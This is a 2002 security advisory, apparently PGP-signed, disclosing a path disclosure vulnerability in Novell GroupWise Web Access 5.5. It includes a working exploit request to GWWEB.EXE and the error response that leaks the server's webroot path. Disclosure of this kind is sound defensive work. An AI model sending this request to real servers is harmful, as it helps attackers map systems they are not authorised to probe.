-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Novell GroupWise Web Access Path Disclosure Vulnerability Type: Input Validation Error Release Date: February 28, 2002 Product / Vendor: Novell GroupWise, the premier communication and collaboration tool for the one Net environment, helps you tackle some of the toughest business challenges you face. Whether your organization is small, midsize or large, your employees need e-mail, calendaring, document management and other collaborative tools to open up the lines of communication and keep your business running efficiently. http://www.novell.com/products/groupwise/ Summary: If an attacker submits a web request containing unexpected arguments for script variables, an error message will be displayed containing the path to the webroot directory of the server running the GroupWise Web Access. Exploit: GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0 HTTP/1.1 200 Document Follows Date: Wed, 27 Feb 2002 22:27:08 GMT Server: MIME-version: 1.0 Content-type: text/html Connection: close Could not find file SYS:\NOVONYX\SUITES~1\CGI-BIN\GW5\US\AAA\LOGIN.HTM Tested: Netware Enterprise Web Server 5.1 / GroupWise Web Access 5.5 Vulnerable: GroupWise Web Access 5.5 (And may be other.) Disclaimer: http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory. Author: Tamer Sahin ts@securityoffice.net http://www.securityoffice.net Tamer Sahin http://www.securityoffice.net PGP Key ID: 0x2B5EDCB0 -----BEGIN PGP SIGNATURE----- Version: PGP 7.1 iQA/AwUBPH1sPLuLpFMrXtywEQJzlgCfTn8RnbkHJDYUkbt28B4gT58Jpp4AoMzT SQKOfafzkyXrQUMO9bw80DMN =w9Rd -----END PGP SIGNATURE-----
